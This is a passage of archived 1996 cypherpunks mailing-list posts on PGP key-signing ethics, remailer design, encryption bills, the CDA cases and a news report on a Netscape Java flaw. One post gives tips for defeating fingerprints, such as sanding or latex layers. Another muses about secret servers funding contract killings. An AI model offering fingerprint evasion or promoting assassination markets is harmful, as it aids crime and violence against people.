The mint is the escrow agent.  It still (obviously) needs to be trusted.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 19 May 1996 06:12:13 +0800
To: Black Unicorn <cypherpunks@toad.com>
Subject: Re: Senator, your public key please?
Message-ID: <199605181633.JAA09614@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 5/16/96 -0400, Black Unicorn wrote:
>
>Secondly, the Ethics Committee was very interested in the issue.  As of
>now they have ruled that "exchanging" PGP signatures is an "exchange in
>kind" and an ethics violation.  Ms. Howell expressed exasperation over
>this lunacy, but put it much this way:  "No, you guys don't understand
>what the issues are here, but I don't have 3 hours to explain it all to
>you either."  Apparently the ethics committee is concerned that a
>signature from Leahy's key will constitute some sort of endorsement and the
>"you sign mine and I'll sign yours" looks like influence peddling.
>
>Part of the problem was that several politically oriented groups
>approached Leahy's office and descended like vultures on a carcass,
>all of them wanting to certify his key.  
>
>No signing from Senator's keys for the time being.  She said the ethics
>committee went so far as to prohibit them from soliciting signatures from
>others as well.  Her conservative (and reasonable) interpretation was that
>she couldn't hand over a fingerprint of the key for signing purposes.
>
>As things stand now Ms. Howell intends to try and educate some of the key
>Ethics members over the August break and have a decent signing policy
>after the break itself.
>
>Welcome to the hill.

Gee, isn't it too bad that nobody has thought of a solution for all these 
politician-problems?    B^)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@amaonline.com>
Date: Sun, 19 May 1996 03:22:55 +0800
To: cypherpunks@toad.com
Subject: Re: Defeating fingerprints
Message-ID: <2.2.32.19960518003504.0068cd08@mail1.amaonline.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 03:19 PM 05/17/96 -0700, you wrote:
>ON
>> 
>> On Tue, 14 May 1996, Be Good wrote:
>> > > Burglars and safecrackers sand the ridges off.
>> > 
>> > This sounds like it'd work, but quite tedious.
>> 
>> 	Belt sander and a light touch.
>
>I'm going to try this sanding experiment sometime.
>When I get around to it, I'll post the results here.
>(pressing hard with inkpad and paper)
>
>Shellac or epoxy glue does NOT work, if the thickness is at all managable.
>Tried it, The ridges always find a way to get through.
>It also provides a weaker bond to dry skin than you'd expect.
>The thicker the more likelihood of peeling off.
>Even Krazy Glue. (The UL BS is false.)

Krazy glue _will_ glue fingers, if applied properly. I proved this to a
fellow sailor in 1976 by gluing his thumb and forefinger around a JP-5 vent
pipe aboard the U.S.S. Enterprise. 

Some folks might want to try liquid latex, contact adhesive, silicon sealers
(RTV), or similar products. Soft, flexible, relatively convenient when
applied, and can be 'layered' to the desired thickness. Liquid latex can
usually be found in hobby/craft stores.

Dave Merriman

PS - Pls note new email address; old ISP proved to be unreliable.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMZ0MlcVrTvyYOzAZAQEkiAP7BCf2mrem6K6N/5dcbUeGLCUu/un2yEst
nks1RZBUUeV8q2fojxm6d9y+WJI6NXDJWARkSCCt0YphA7oGQtJwiNzI08NWD5Ed
EHM+yXW7BM+z68eZ+kIL8UNW/64CkGCoMZNkRW2v5ZKMqYOFri6qdgKFm7D40JIN
z0BL1+dkLVE=
=Z73q
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 19 May 1996 06:46:31 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: anonymous companies
Message-ID: <199605181709.KAA20680@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain



>> At 06:42 PM 5/16/96 -0700, Wei Dai wrote:
>> > I'll just give one problem: the principal-agent problem.  How do owners of
>> > the company make sure the managers operate the company in their best
>> > interest?


>On Fri, 17 May 1996 jamesd@echeque.com wrote:
>> Actually looting of companies happens a lot right now today, and very
>> seldom leads to criminal charges.  Twice I have lost a job because the
>> company I worked for went under, apparently due to looting.

At 08:37 AM 5/18/96 -0400, Black Unicorn wrote:
> Be careful to distingiush "owner" from "employee."  All to common a
> mistake I fear.
> Until someone passes a constitutional right to not be fired, well, you're
> employeed at the will and by the good grace of the owners and your boss.

I was of course referring to looting by the management, not the
shareholders, as should have been obvious from context.


>> In others, such as net startups,
>> I see no solution other than increased reliance on personal individual
>> capital.

>Still, vulnerable to last round problems.

Reread:  Your above statement makes no sense in context.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hieronym@desk.nl (t byfield)
Date: Sat, 18 May 1996 20:25:38 +0800
To: Black Unicorn <cypherpunks@toad.com>
Subject: Re: Senator, your public key please?
In-Reply-To: <Pine.SUN.3.93.960516113814.751D-100000@polaris.mindport.net>
Message-ID: <v03006600adc32fbc08ec@[193.0.0.2]>
MIME-Version: 1.0
Content-Type: text/plain


6:01 PM  +0200 5/16/96, Black Unicorn:

> Secondly, the Ethics Committee was very interested in the issue.  As of
> now they have ruled that "exchanging" PGP signatures is an "exchange in
> kind" and an ethics violation.  Ms. Howell expressed exasperation over
> this lunacy, but put it much this way:  "No, you guys don't understand
> what the issues are here, but I don't have 3 hours to explain it all to
> you either."  Apparently the ethics committee is concerned that a
> signature from Leahy's key will constitute some sort of endorsement and the
> "you sign mine and I'll sign yours" looks like influence peddling.

	And, in fact, according the general outlines of the "reputation"
schemes advanced hereabouts, they're right: that's why they call it
"reputation _capital_," mais oui?
	There's no reason that webs of trust of well-signed keys couldn't be
very fluidly incorporated into patronage networks, for example, or that
their incorporation would affect network dynamics in any notable way. One
doesn't need to understand political theory or economy in any analytical
sense to become part of a patronage network, and one doesn't need to
understand cryptography to know  what a key is vaguely enough to be swayed
by someone waving a "well-signed" key around--in fact, _not_ understanding
cryptography will lead people to be wowed by such keys. Most people don't
understand cryptography, and most will continue not to understand it. So in
the pristine realm of mathematics, the Ethics Committee may be wrong, but
in the real world of sloppy thinking they're basically right. Basically.
	If my key was signed _only_ by the CEOs of the top 10 Fortune 500
companies, a few dozen heads of state,  bigwig spooks from around the
world, the pope and a dozen cardinals, it's not too hard to imagine how I
could open a few doors with that key--and make a buck or two in the process.
	After all, Uni, what _does_ a signature signify? You were asking some
very pointed questions about that quite recently.


Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 18 May 1996 15:22:48 +0800
To: snow@smoke.suba.com (snow)
Subject: Re: SEVERE undercapacity, we need more remailer servers FAST
In-Reply-To: <Pine.LNX.3.93.960516193002.1235E-100000@smoke.suba.com>
Message-ID: <199605180028.KAA23028@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 	Come to think of it, would the Mixmaster package run under Xenix?
> I have a 286 laying around collecting dust...

relay@suburbia.net is running a type2 remailer (mixmaster)

Use at will.

--
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 19 May 1996 06:49:07 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.19 - 27 Reps Urge President to Abandon Key-Escrow Encryption Policy
Message-ID: <199605181744.KAA10141@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:35 PM 5/17/96 -0400, Bob Palacios wrote:

> CDT POLICY POST Volume 2, Number 19                           May 17, 1996
>

>The bi-partisan call to President Clinton to abandon the Administration's
>key escrow policy is yet another encouraging sign of increasingly strong
>Congressional support for reform of US encryption policy.  Congress is
>currently considering several bills designed to encourage the widespread
>availability privacy-protecting technologies for the Internet by lifting
>export controls on strong encryption:
>
>* HR 3011, the "Security and Freedom Through Encryption (SAFE) Act of
>  1996", sponsored by over 30 members including  Reps Goodlatte (R-VA),
>  Campbell (R-CA), Eshoo (D-CA), Boucher (D-VA).
>
>* S. 1726, the "Promotion of Commerce On-Line in the Digital Era (Pro-
>  CODE) act of 1996, sponsored by Senators Burns (R-MT), Leahy (D-VT),
>  Pressler (R-SD), Dole (R-KS), Wyden (D-OR), and Murray (D-WA)
>
>* S. 1587, the "Encrypted Communications Privacy Act of 1996", also
>  sponsored by Senators Burns and Leahy.
>
>Hearings on HR 3011 (Rep Goodlatte's bill) and the Burns/Leahy S. 1726
>(Pro-CODE) are expected in June.

You know, I really would appriciate it if CDT didn't present S1587 as if it 
is just another "relax restrictions on encryption" bill.  We raked that bill 
over the coals, found it seriously flawed, and generally pro-encryption 
people don't seem to be defending it at all. It contained many aspects which 
have the prospect of future danger to the use of encryption.

 And, S. 1726 seems to contain most of the desireable aspects of S.1587, and 
few of the negatives.  Add to that the fact that Leahy (as described above) 
seems to be supporting S. 1726, there is no need to make it appear to an 
uninformed person that S. 1587 that it is anything other than a mistake.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 May 1996 07:06:00 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Senator, your public key please?
Message-ID: <adc35872010210048f5e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:10 AM 5/18/96, t byfield wrote:

>        There's no reason that webs of trust of well-signed keys couldn't be
>very fluidly incorporated into patronage networks, for example, or that
>their incorporation would affect network dynamics in any notable way. One

Keys, key signings, and webs of trust can be used in all sorts of ways.

And I expect the "burrowcrats" will try to regulate the use.

Imagine, for example, if I use a "web of trust" to help me decide who's
trustworthy enough to negotiate the sale of my house to.

Further imagine that I want to see keys signed by Tom Metzger, my buddy
from the Aryan Nations. Guess what? No blacks will have their keys signed,
and hence I'll have to tell them, "Sorry, you're just not in my web of
trust."

(Now, this is a hypothetical, meant to show that use of a web of trust can
trigger such decisions, and could thus trigger legal challenges.)

The web of trust may not be transitive, but the "web of taint" may be more so.

New forms of blackballing, blacklisting, redlining, etc.

And I fully expect that who signs one's keys, and whose signatures are
found on one's keys, may become a political and legal issue in the coming
years.

What if, for example, Sen. Leahy _did_ end up in the web of trust for Aryan
Nation? Even if he never intended it, this could have some severe PR
repercussions.

An exciting new world we're entering.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 19 May 1996 07:30:52 +0800
To: snow <cypherpunks@toad.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <199605181752.KAA10188@newmail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:44 PM 5/17/96 -0500, snow wrote:

>	How about this as an idea:
>
>	Get a few (3 to 5) accounts in a high density market (i.e. lots of
>ISP's locally) set up a unix machine on a cheap machine. Have the anon
>messages get sent to the pop accounts. Once an hour (or less depending on
>budget) have the unix box poll the different pop accounts mix the messages
>and resend them the next hour. 
>	This could be further obfuscated by batching the messages up and
>posting a whole chunk of messages to a different similar remailer else
>where, or by just plopping an encrypted tar'd file on a ftp site where
>another remailer grabs them and splits and remails them.

It seems to me that if we consider that there are two separate functions remailers provide:

1.  Anonymization.

2.  Jurisdiction swapping

Then perhaps one way to improve the robustness of remailers against 
copyright-type legal attacks is to provide remailers with temporary (1-2 
week) remail-only sites.  All material would be processed by the front end, 
then delivered in bulk to the other site.   This sounds similar to the idea 
you described.

That way, the remailer's "front end" can stay around for years, developing 
reputation.  Any attack on copyright would simply be an attack on the back 
end, which wouldn't last anyway.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan McGuirk <mcguirk@indirect.com>
Date: Sun, 19 May 1996 07:26:25 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: [NOISE] Hackers soundtrack
In-Reply-To: <Pine.SUN.3.91.960517143822.12253A-100000@tipper.oit.unc.edu>
Message-ID: <Pine.BSD/.3.91.960518111407.17990A-100000@bud.indirect.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 17 May 1996, Simon Spero wrote:
> Update on an old thread...
> 
> Apparently it was released last week in England, so it may be available 
> in some import racks. 

The album "Music For The Jilted Generation" by The Prodigy has a lot of 
the best stuff from the soundtrack, too...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 19 May 1996 04:34:15 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: (legal) Re: CDA Dispatch #10: Last Day in Court
In-Reply-To: <claeSc600YUz0uOjMH@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.91.960518113457.2985C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Declan B. McCullagh wrote:

> Speaking of appeals, I've been thinking about what happens with the CDA.
> Okay, so we have two court cases going on, the Shea v. Reno case in NYC
> and the coalition lawsuits combined in Philly.
> 
> What happens if the DoJ loses both the NYC and Philly cases and (as they
> said they would) appeals to the Supreme Court. Won't they take the
> weaker of the two cases, which is Shea's?

If they lose they are almost certain to appeal both cases.  If they don't 
appeal a loss, it means that plaintiffs won, i.e. get what they asked 
for.  The government isn't going to sit still for that while another case 
is proceeding.  

> 
> And what happens if we win but Shea loses -- does the DoJ appeal in
> Philly and Shea appeals in NYC?
> 

No problem with two sides each appealing different verdicts to the 
supreme court.  That's what it's for - to sort things out and make the 
circuits consistent.

> If we lose, does our appeal automatically go to the Supreme Court? The
> language in the statute is unclear here -- it only specifices what
> happens when the law is declared unconstitutional. But if it isn't,
> can't the DoJ argue that our appeal should go to the Third Circuit
> instead?

Sorry, I don't recall the language well enough and I'm on the road.  I 
thought it went to the Supremes no mater what; that's the usual practice, 
but i could be wrong.   there is a procedure for by-passing the Court of 
Appeal in urgent cases.  Also, if one case is on a slow track and the 
other one is on a fast track, there are procedures for getting involved, 
at least as amici, in the fast track case.

[I am away from Miami from May 8 to May 28.  I will have no Internet 
connection from May 22 to May 29; intermittent connections before then.]
 
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm there.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 19 May 1996 07:55:43 +0800
To: tcmay@got.net
Subject: Re: Is Chaum's System Traceable or Untraceable?
In-Reply-To: <adc276f5060210049520@[205.199.118.202]>
Message-ID: <199605181841.LAA17739@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> (On the other hand, I have had a longstanding faith that the system can be
> made to be both payer- and payee-anonymous. Moneychangers, for example.)

	You don't need faith. You don't need moneychangers, even. You
just need to pay attention when Ian posts to cypherpunks.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Sun, 19 May 1996 08:45:37 +0800
To: cypherpunks@toad.com
Subject: Remailers vs Nyms - conflicting assumptions?
Message-ID: <2.2.32.19960518184824.006cded8@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been enjoying the discussion of "disposable" remailers, but I note a
problem. If this has been addressed before, well, now it's being noted again.

In my (admittedly limited) experience with nym servers, the reply path is
fixed - it goes through specified hops. This creates A Problem when any one
of the remailers involved goes down. There's no way for the mail to get
through. There's not even a way for the nym holder to verify that there is a
site down, as opposed to some more transitory problem, without information
from an external source.

This seems to me a fairly serious weakness, given prevailing governmental
attitudes.

What would it take to create a nym server that could route around the death
or disability of any given mailer?

--
Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 19 May 1996 00:43:13 +0800
To: cypherpunks@toad.com
Subject: NYT on Netscape Flaw
Message-ID: <199605181156.LAA22255@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, May 18, 1996, pp. 31, 43. 
 
 
   New Netscape Software Flaw Is Discovered 
 
   By John Markoff 
 
 
   Computer science researchers at Princeton University said 
   yesterday that they had discovered a new and potentially 
   serious flaw in the Netscape Communicatlons Corporation's 
   Navigator software, the leading program used to browse the 
   World Wide Web of the Internet. 
 
   The flaw, which was found in recent versions of the 
   Netscape software that support Sun Microsystems' Java 
   programming language, could allow people to write 
   destructive or malicious programs and potentially destroy 
   or steal data or otherwise tamper with a computer that was 
   connected to the Internet and used the Navigator program. 
 
   Netscape executives said that the researchers had been in 
   touch with them about the problem on Thursday and that the 
   software company was in the process of producing a new 
   version of the Navigator program that would protect against 
   potential attacks. 
 
   This is the third flaw in the Navigator program discovered 
   in recent months by the Princeton group. Netscape has been 
   under tremendous scrutiny over the security of its popular 
   software since the fall, when a group of researchers at the 
   University of California at Berkeley discovered a flaw in 
   the Netscape security system. 
 
   In the most recent case, Thomas Cargill, an independent 
   software consultant working with the Princeton group, 
   discovered a problem in the way Netscape has used the Java 
   language in its Navigator program. The group disclosed a 
   similar flaw in March in the Netscape Navigator that would 
   permit a Java program to run illicitly on a computer that 
   was running the Netscape program and perform damaging 
   operations. 
 
   "Netscape has fixed a series of problems, and the overall 
   security of their system has improved, but there is still 
   some reason for concern," said Prof. Edward Felton, the 
   leader of the Princeton group, which includes two graduate 
   students, Drew Dean and Dean Wallach. 
 
   Programs that are known as viruses and worms are a serious 
   threat to computer networks because they can move from 
   machine to machine quickly, carrying out destructive 
   applications. Sun Microsystems' Java language has been 
   designed to limit what a virus can do once it is 
   transferred across the Internet. But the security 
   mechanisms only work if the virus's code can be restricted 
   in a safety "box" constructed out of software. 
 
   Netscape's executives acknowledged yesterday that the 
   Princeton University team had on both occasions been able 
   to find doors that let program code out of the safety box. 
 
   "We're trying to create a sandbox which has rooms where 
   only certain things happen," said Jeff Trehaft, Netscape's 
   director of security. "What happened is that the Princeton 
   team found a door and it turned out that there weren't 
   adequate protections surrounding the door." 
 
   The company said it was in the process of posting on the 
   Internet a new version of the most recent test version of 
   its next-generation Internet program, version 3.0 beta. The 
   program contains a special fix to prevent the new attack. 
   He said Netscape had not yet posted a fix for the most 
   recent commercial release of its software, version 2.02, 
   but was instead encouraging customers to use the 3.0 beta 
   software. 
 
   Since the Berkeley researchers discovered the first 
   security flaw the company has offered a $1,000 "bugs 
   bounty" to programmers who are able to locate security 
   flaws. 
 
   [End] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 May 1996 05:38:43 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605171738.KAA05800@netcom9.netcom.com>
Message-ID: <BZs5ND7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> writes:
> 1. there is no economic incentive.

So, add the code to mixmaster (and even the old style remailers) to
collect e-cash as it passes on the anonymous message. Then this will
be a good way to accumulate some e-cash, and a number of people will
try running remailers for this very purpose. Witness the recent
Usenet spam by someone advertizing a for-pay remailer.

> 2. there is no good way to deal with spams or other so-called "abuse"

Nor should there be.  What's one person's abuse is another person's
free speech.  Internet traffic should not be censored based on contents.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yap Remailer <remailer@yap.pactitle.com>
Date: Sun, 19 May 1996 08:48:20 +0800
To: cypherpunks@toad.com
Subject: None
In-Reply-To: <199605171754.NAA02553@fuseki.aa.ans.net>
Message-ID: <199605181915.MAA13072@yap.pactitle.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: michael shiplett <walrus@ans.net>
> Date: Fri, 17 May 1996 13:54:51 -0400
> 
>   I do agree extending commonly used mailers would be helpful.
> 
>   Emacs + mailcrypt (with or without MH & mh-e) already provide the
> means to chain one's message through type 1 or mixmaster type 2
> remailers. mailcrypt will even choose arbitrary remailer routing for
> you based on information gathered from Raph Levien's remailer
> list. Unforunately this is not a turnkey solution and requires more
> configuration than most users probably want.
> 
> michael

Mailcrypt support for type 2 remailers doesn't really work very well.
You can't specify more than one recipient.  You can't post to a
newsgroup with the "post: news.group" destination.  And somehow not
all the right headers end up making it into the next message.

A better emacs interface to mixmaster remailers is definitely needed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 19 May 1996 06:33:41 +0800
To: cypherpunks@toad.com
Subject: Re: Why the Poor are Mostly Deserving of their Fate
Message-ID: <9605181737.AB07651@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 18 May 96 at 4:30, Duncan Frissell wrote:


> 1) get a high school diploma
> 2) get married
> 3) get any job
> 
> Only about 2 tenths of 1% of those who satisfy those three
> requirements incomes below the official poverty line.

> I try and keep in mind that 80-90% of the "take" in government
> programs for the "poor" goes to unpoor government employees.
> DCF


Hi DCF.

Can you please tell me where I can get such kind of information?  Is 
there any databank of such facts?  Would be great fun to have!

Regards!

JFA

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 19 May 1996 07:33:58 +0800
To: cypherpunks@toad.com
Subject: (Fwd) Mail Delivery Failure.
Message-ID: <9605181736.AB07651@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



On 15 May 96 at 19:01, Mark M. wrote:


> > .  What if a company does not pay as expected -
> 
> A company could not afford to have such a loss of reputation. 
> Nobody is going to work for a company that doesn't pay its
> employees.


Yes, but anonymity would prevent the easy build-up of reputation too:

If Joe Anon9876 say: "company ANON1234 Inc screwed me, how peoples
will know that it is not a unscrupulous competitor trying to damage
their reputation?

Now, if Joe Anon9876 decides to disclose to the public that his real
name is John Doe to give more weight to his denounciation, and
depending on wether or not his bosses *are* or are not crooks, he
might very well get some sort of "prediction" on his head.

Now, Jim Bell's servers don't have to be completely public.  Suppose
some servers were built so that the donation address would be known
but the list of donation would be kept secret: Such server could
thrive.  Most "donation" here would not be 2 bucks but rather 20,000
bucks to ensure that the contract would get taken up promptly.  And
since the targets would not be published, there would be not even a
hint that company ANON1234 *might* have put a contract on John Doe
(Now, aka Joe Anon9876) .  The fact that an open AP server exists
makes the later possibility also possible.  To have access to the
target list would require to be member of a *very* close circle, or
maybe, actually, just en employee of ANON_KILLERS4567_Inc.


Reputation is standing on the fact that an entity disclose it's 
existence, accepts to act in full view of significant others, and is
prepared to show evidence of good conduct to said significant others.
And also on the fact that a challenger to the reputation have to put
his own on the opposite platter of the balance.

Anonymity makes it hard to do.

JFA

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zalchgar@juno.com (zalchgar)
Date: Sun, 19 May 1996 08:19:08 +0800
To: Cypherpunks@toad.com
Subject: Netscape 128-bit
Message-ID: <19960518.122709.15078.0.zalchgar@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Do you have to buy the 128 domestic version of Netscape? They used to
make it available on their FTP sites, but now they are all 40-bit
exportable versions. If you don't have to buy it what is the procedure
to get it?

-Erinn L.T




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Sun, 19 May 1996 09:44:45 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <adc3d26f030210048d69@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


They are not very hard to set up and run. I think any blinding is likely to
be simple header faking. Totally insignificant security compared to
something like Mixmaster. I proposed a system some time back based on
message pools, but it attracted little interest. The down side of the
proposal is the large amount of bandwidth required. Each remailer has to
receive all messages for all remailers in the pool. The upside of the
proposal was that it allowed secure reply blocks (ones that can't simply be
tracked forward).

        -Lance

>I would really like to see a remailer that is somehow blinded.
>
>I don't know enough about how mail paths are generatered, but is it
>impossible to conceal the origin of remailer postings?
>
>Postings made to remailernym@alpha.c2.org would be spit out somewhere but
>without accountability?
>
>Impossible?  Would do wonders defeating traffic analysis.
>
>I'd consider running a remailer, but after listening to the response to
>the anonymous poster a while back, it sounds like there are few if any
>simple options which do not require major time and effort to setup and
>run.
>
>---
>My preferred and soon to be permanent e-mail address:unicorn@schloss.li
>"In fact, had Bancroft not existed,       potestas scientiae in usu est
>Franklin might have had to invent him."    in nihilum nil posse reverti
>00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
>Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Sun, 19 May 1996 10:09:37 +0800
To: "E. ALLEN SMITH" <hfinney@shell.portal.com
Subject: Re:  SEVERE undercapacity, we need more remailer servers FAST
Message-ID: <adc3d3ea04021004e67a@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


It seems very reasonable to allow posting only through nym-servers. That
gives a point at which payment can be received, and an account which can be
removed for abuse. Since the nym is password protected, it also help build
the reputation of the nym.

        -Lance

At 5:46 PM 5/15/96, E. ALLEN SMITH wrote:
>From:   IN%"hfinney@shell.portal.com"  "Hal" 15-MAY-1996 19:23:06.71
>
>>Maybe the operators can try to plead that they are like "common carriers"
>>and should not be blamed for what people post.  Still it is going to take
>>deep pockets at best to prevail in this dispute, and it isn't even clear
>>that the remailer will win.  Maybe the lawyers on the list could comment
>>on legal liability of a remailer used to repeatedly post copyrighted
>>material, whether Scientology scriptures or Microsoft Word binaries.  I
>>don't see how it can happen.
>
>        Part of this problem may be solved through the proper decisions on
>the liability of ISPs for material on them. The concept would seem to be
>extensible. If a country has A. good laws on the subject and B. a pretty good
>court system - e.g., one in which it's difficult to sue and easy to defend -
>that country would seem to be suitable for setting up a remailer front end.
>Other remailers can just be used for chaining, and can't be proven to have
>carried a message (even unknowingly) without defeat of the remailer system
>via traffic analysis. (A reason for remailer operators to run automatic
>mailing scripts, BTW.)
>
>>This was the basis for my suggestion that remailers may have to stop
>>supporting posting of messages, and instead be used for private mail
>>between consenting individuals.  Granted, this would probably eliminate
>>99% of non-cover remailer traffic.  But I would argue that as long as the
>>core functionality is there of letting people communicate with each other
>>anonymously and consensually, we would still offer an important service.
>
>        In other words, a remailer that would only forward mail to someone if
>the email address in question gave consent? Mailing lists and mail-to-news
